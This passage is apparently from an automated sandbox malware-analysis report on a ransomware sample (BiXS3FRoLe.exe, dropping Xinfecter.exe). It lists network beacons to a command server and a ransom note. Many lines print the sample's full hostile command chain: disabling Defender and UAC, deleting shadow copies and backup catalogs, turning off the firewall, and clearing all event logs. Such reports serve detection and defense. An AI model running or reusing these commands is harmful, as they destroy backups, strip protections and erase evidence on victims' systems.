w6lyWifWI5nJO+DhbrX2C8UkJBIBNXd3HPQ5kOWj8/d7z8+E0E7pUIT1FVq6/NmraFb1/1hOXxv3EnAFuZcO77zg3CMNaYHZ7KSQI0CgYEA11lpTWjR1C4kp//RZYK5wdYEgJ/jIfP8Oi2YH/Ru782wjslS+7GJD9UucKrKHio0wgtUg6XYIzZAMUEfHJowCCkouHU5kTiglhrowCTX12OmG92BHmw8xdCIoNha7SpTW4JDo5QC2S6VzbXg4MaomJmWZ5AAE3uiDPCkExNEWwUCgYEAzlMyzWzwxLQQX7xO2pT3U+9n5vZxmQo/oWwY7Qv7P1rvi6jyQHi89yCHf+kYaW8LvuNnyQLuUOWyptVAPRkAkWl8PjZ+rHjGBpdDbE0iXohRaY+FuwpuMpoiGN+kM6r3ITyxdjhKlp1QWCWdUdWBWk1MzbRgUB+d6hI0JjCtgPMCgYA/VohiD8U+Z+yp4dQs6jaibB9xH/eCdO/U4DvNKcZGh8qEWVSkYWSML6Q/QUqBV7UqA1UXqT+R4seWBBg1lsLVOUg2QJh2AZiknoCw+8cDHU75IwfbxXtJPVVce96B/WPPnsiZheK4WP7iJm9RK17DeHeH3w8UygJ8RsbYbxQaxQKBgFT1FOss25xKJNwgXLRbdOZThSLd8opPg5zSKGGbhZKO2xtjrwt9AoPgN8tB3OAeqnvHDJ4QRAMxZ64bkuv7PHgcYFXaNCjmb6hcZw56HTX75UmVc00ES34/d3OnYbrsC2gJ7rg1S+OqMCRLuT/QYnB6Lq8OCYpnXyQlnQCqocuvAoGAbpAgPDQMJf9cq3W4rtGckrDjMvtqWe8B6IIEhx4DXoHLXd4YGqVcGletuFE3jVJOdqWuJnVeITD/nTiDxSc5TZ+LPvq4uOehbt6nRqLidsytt0jkkQSlI2tSlWLZR4Z4j0n48oddev7s3B3kiN7+g6z+tlF7YHKmVCLc/U2D2QU=&21L0I*7.999268(2)2,d5Evo.team1992@gmail.com HTTP/1.1Host: 185.147.34.53Connection: close
      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
      Source: Joe Sandbox ViewIP Address: 185.147.34.53 185.147.34.53
      Source: Joe Sandbox ViewASN Name: HOSTSLIM-GLOBAL-NETWORKNL HOSTSLIM-GLOBAL-NETWORKNL
      Source: unknownDNS query: name: api.ipify.org
      Source: unknownDNS query: name: api.ipify.org
      Source: unknownTCP traffic detected without corresponding DNS query: 185.147.34.53
      Source: unknownTCP traffic detected without corresponding DNS query: 185.147.34.53
      Source: unknownTCP traffic detected without corresponding DNS query: 185.147.34.53
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A78CB0 std::locale::_Init,WSAStartup,socket,gethostbyname,htons,connect,send,recv,recv,closesocket,WSACleanup,0_2_00A78CB0
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: text/*User-Agent: YourUserAgentHost: api.ipify.org
      Source: global trafficHTTP traffic detected: GET /110_And_Netword_Drive_Size:0_Encryption_Mode:_Fast_Mode!Empty]_____03/10/2023,_10:57:18$_06/12/2024-_7:42:[Version_10.0.19045.2006|Microsoft_Windows_10_Prohg3l,8.46.123.228~L8aq7AthsgOC4cJv42nbpH3UXKqgFnpfIF2Mh/P93OgZkF3JPD5MmtdEB9fVNMwZNaSO/3She5MBu7aPiTlTr2f0h8Tby5EoEg6fH+I199CVCljV+q3qJlndcf7Qc0kpc+2y3oLE5MQimq+Sf6T4Sf6STfXjIiYXs9UejSYERe9ho6EoO5vZ9lqVAIjxir0zzTwlMBuiCCOLQKgMSKNQAuM2fcGfrSqnnm3gPaoVOBR/PHwB6eAARud748ct0eiTO01y+AMJtI29FqtGk0+k/Hii9CWn8qrY6CUWFZABgf5KOmsSq6wR87WUdb+aznRnLauO9YOFUY6U4pOgX8eWhczQtRa9JO3ew5Zag/CvoIJ98OGRGpkFtn7SaCg4DfI5O/fr5qDCAYePnjRJhH45ZUkA6wwt2d1R88d4k1h4uWGqB7zXu8Q1AQw70gqz7qyIcIKHSsfZc3IDiOUZkQIITDLVehvE24+9mM4BAPGd1Fdx+R8CfTIgd5lo03LOE460v3eJ7x23hr4tJjerTwWk4kYVe1qeoAOzv9dl0GZgzIAjS0UYxunSSCfEOXvn3u7RtP7/F9bk50RTc7msTK7yw7sC8fcXypL3pxeW/AgERAoIBAEySUw5HjWknEMGnG1ixYvGcEz6KwSQgRXCK5xLzDXPTLBa/gI1SnNYuDVqidl7MR918bHVZp/6KYNyPbB4bMcMCP7GwX2m5bf0MJ+YE2tdGGxXybo9SmWaCv4A9khMIPpnhk3MzJg9bBzj17yChsdDynZzjrWzeqmnNm5MKJItU4DoROjGTGPgzLm8bzHSWqmKtKOsf8XySDxmJtlDdXt7NUj67TFGhe+XSImP3V0IMANR2pw6lyWifWI5nJO+DhbrX2C8UkJBIBNXd3HPQ5kOWj8/d7z8+E0E7pUIT1FVq6/NmraFb1/1hOXxv3EnAFuZcO77zg3CMNaYHZ7KSQI0CgYEA11lpTWjR1C4kp//RZYK5wdYEgJ/jIfP8Oi2YH/Ru782wjslS+7GJD9UucKrKHio0wgtUg6XYIzZAMUEfHJowCCkouHU5kTiglhrowCTX12OmG92BHmw8xdCIoNha7SpTW4JDo5QC2S6VzbXg4MaomJmWZ5AAE3uiDPCkExNEWwUCgYEAzlMyzWzwxLQQX7xO2pT3U+9n5vZxmQo/oWwY7Qv7P1rvi6jyQHi89yCHf+kYaW8LvuNnyQLuUOWyptVAPRkAkWl8PjZ+rHjGBpdDbE0iXohRaY+FuwpuMpoiGN+kM6r3ITyxdjhKlp1QWCWdUdWBWk1MzbRgUB+d6hI0JjCtgPMCgYA/VohiD8U+Z+yp4dQs6jaibB9xH/eCdO/U4DvNKcZGh8qEWVSkYWSML6Q/QUqBV7UqA1UXqT+R4seWBBg1lsLVOUg2QJh2AZiknoCw+8cDHU75IwfbxXtJPVVce96B/WPPnsiZheK4WP7iJm9RK17DeHeH3w8UygJ8RsbYbxQaxQKBgFT1FOss25xKJNwgXLRbdOZThSLd8opPg5zSKGGbhZKO2xtjrwt9AoPgN8tB3OAeqnvHDJ4QRAMxZ64bkuv7PHgcYFXaNCjmb6hcZw56HTX75UmVc00ES34/d3OnYbrsC2gJ7rg1S+OqMCRLuT/QYnB6Lq8OCYpnXyQlnQCqocuvAoGAbpAgPDQMJf9cq3W4rtGckrDjMvtqWe8B6IIEhx4DXoHLXd4YGqVcGletuFE3jVJOdqWuJnVeITD/nTiDxSc5TZ+LPvq4uOehbt6nRqLidsytt0jkkQSlI2tSlWLZR4Z4j0n48oddev7s3B3kiN7+g6z+tlF7YHKmVCLc/U2D2QU=&21L0I*7.999268(2)2,d5Evo.team1992@gmail.com HTTP/1.1Host: 185.147.34.53Connection: close
      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
      Source: BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000C8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
      Source: BiXS3FRoLe.exe, 00000000.00000002.2503580325.0000000000769000.00000004.00000010.00020000.00000000.sdmp, BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp, BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
      Source: BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/)
      Source: BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/E
      Source: svchost.exe, 00000006.00000002.1364826982.000001F12F613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
      Source: svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
      Source: svchost.exe, 00000006.00000002.1365005778.000001F12F65A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364417613.000001F12F659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
      Source: svchost.exe, 00000006.00000002.1364951726.000001F12F646000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1365045316.000001F12F664000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364082851.000001F12F670000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364394555.000001F12F645000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364275582.000001F12F65F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1365083917.000001F12F672000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364357788.000001F12F65B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364190386.000001F12F663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
      Source: svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
      Source: svchost.exe, 00000006.00000002.1365064697.000001F12F669000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364172289.000001F12F668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
      Source: svchost.exe, 00000006.00000002.1365100771.000001F12F678000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364027254.000001F12F676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
      Source: svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
      Source: svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?
      Source: svchost.exe, 00000006.00000002.1365045316.000001F12F664000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364357788.000001F12F65B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364190386.000001F12F663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
      Source: svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
      Source: svchost.exe, 00000006.00000002.1365064697.000001F12F669000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364172289.000001F12F668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
      Source: svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
      Source: svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
      Source: svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
      Source: svchost.exe, 00000006.00000002.1365045316.000001F12F664000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364190386.000001F12F663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
      Source: svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
      Source: svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
      Source: svchost.exe, 00000006.00000002.1364951726.000001F12F646000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1365045316.000001F12F664000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364394555.000001F12F645000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364190386.000001F12F663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
      Source: svchost.exe, 00000006.00000003.1364011107.000001F12F655000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364190386.000001F12F663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
      Source: svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
      Source: svchost.exe, 00000006.00000002.1365045316.000001F12F664000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364190386.000001F12F663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
      Source: svchost.exe, 00000006.00000002.1364951726.000001F12F646000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364394555.000001F12F645000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364275582.000001F12F65F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
      Source: svchost.exe, 00000006.00000002.1364826982.000001F12F627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
      Source: svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
      Source: svchost.exe, 00000006.00000003.1263372892.000001F12F639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
      Source: svchost.exe, 00000006.00000002.1365064697.000001F12F669000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364172289.000001F12F668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
      Source: svchost.exe, 00000006.00000003.1364394555.000001F12F645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
      Source: svchost.exe, 00000006.00000003.1263372892.000001F12F639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
      Source: svchost.exe, 00000006.00000003.1263372892.000001F12F639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
      Source: svchost.exe, 00000006.00000003.1364296546.000001F12F65E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
      Source: svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
      Source: svchost.exe, 00000006.00000003.1263372892.000001F12F639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
      Source: svchost.exe, 00000006.00000002.1365005778.000001F12F65A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364417613.000001F12F659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
      Source: BiXS3FRoLe.exe, Xinfecter.exe.0.drString found in binary or memory: https://www.coinbase.com/how-to-buy/bitcoin
      Source: BiXS3FRoLe.exe, Xinfecter.exe.0.drString found in binary or memory: https://www.kraken.com/learn/buy-bitcoin-btc

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Yara detected TrojanRansom
      Source: Yara matchFile source: Process Memory Space: BiXS3FRoLe.exe PID: 7364, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: Xinfecter.exe PID: 8172, type: MEMORYSTR
      Contains functionality to clear event logs
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"0_2_00A94049
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"0_2_00A9C170
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"0_2_00A9D08F
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"48_2_00034049
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"48_2_0003C170
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"48_2_0003D08F
      Deletes shadow drive data (may be related to ransomware)
      Source: BiXS3FRoLe.exeBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic
      Source: BiXS3FRoLe.exe, 00000000.00000003.1283798026.0000000000CB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: BiXS3FRoLe.exe, 00000000.00000003.1283798026.0000000000CB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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" alt="Paris"></div></br><div class="fnt">Your Files Has Been <span class="xsw">Stolen</span> And <span class="xsw">Encrypted!</span></div></hr></br></br></br><div class="vl"><div class="Mrgnlf">All Your Files Are Locked And Important Data Downloaded !</br></br>Your Files Are No Longer Accessible Don't Waste Your Time, Without Our Decryption Program Nobody Can't Help You .</br></br>If Payment Isn't Made After A While We Will Sell OR Publish Some Of Your Data, You Don't Have Much Time!</br></br>Your ID : <span class="spnn"><html><head><title>reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentp
      Source: BiXS3FRoLe.exe, 00000000.00000003.1283798026.0000000000CB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: BiXS3FRoLe.exe, 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: BiXS3FRoLe.exe, 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: BiXS3FRoLe.exe, 00000000.00000000.1257811411.0000000000B53000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: BiXS3FRoLe.exe, 00000000.00000000.1257811411.0000000000B53000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: Xinfecter.exeBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic
      Source: Xinfecter.exe, 00000030.00000000.1392310632.00000000000F3000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: Xinfecter.exe, 00000030.00000000.1392310632.00000000000F3000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: Xinfecter.exe, 00000030.00000002.1394748759.00000000000F3000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: Xinfecter.exe, 00000030.00000002.1394748759.00000000000F3000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: BiXS3FRoLe.exeBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: BiXS3FRoLe.exeBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: S-6748.bat.0.drBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: Xinfecter.exe.0.drBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
